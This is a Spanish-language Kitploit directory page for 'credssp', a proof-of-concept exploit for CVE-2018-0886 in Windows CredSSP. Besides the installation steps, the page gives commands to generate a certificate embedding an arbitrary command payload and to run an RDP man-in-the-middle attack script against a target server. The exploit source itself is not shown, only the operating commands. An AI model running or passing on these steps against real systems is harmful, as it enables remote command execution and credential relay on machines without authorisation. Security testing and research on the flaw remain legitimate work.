Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
credssp — Un código que demuestra la CVE-2018-0886 | Kitploit
Herramientas/GitHubGitHub/preempt/credssp
Análisis de VulnerabilidadesExplotaciónMovimiento LateralPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubpreempt/credssp

credssp

Un código que demuestra la CVE-2018-0886

Ver Repositorio
26757hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

credssp

Este es un código PoC para explotar CVE-2018-0886. Debe utilizarse únicamente con fines educativos. Se basa en un fork del proyecto rdpy (https://github.com/preempt/rdpy), que permite también el relay de credssp.

Escrito por Eyal Karni, Preempt [email protected]

Compilación

Instrucciones (Linux)

Si utiliza Ubuntu 14, revise el archivo install. Fue probado en Ubuntu 16.04.

root@kitploit:~
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
  • Se asume un estado inicial bastante limpio. Es mejor desinstalar primero los componentes relevantes, como cryptography o pyopenssl (pip uninstall cryptography).
  • Es necesario instalar una versión diferente de openssl para que esto se ejecute correctamente. El script de instalación lo hace.
  • Siga las instrucciones en el orden descrito.

Ejecutar el exploit

Exporte un certificado adecuado para autenticación de servidor desde cualquier dominio. (Se utiliza para RDP https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))

Para generar un certificado que explote la vulnerabilidad (contiene el payload), use:

root@kitploit:~
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 

(ExportedCert es el certificado exportado del paso 1. exploitc.pem y exploitk.pem son el certificado generado y la clave privada, respectivamente)

Para ejecutar el script de ataque:

root@kitploit:~
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer

Más detalles en la sección de uso de los scripts (--help).

Descargar herramienta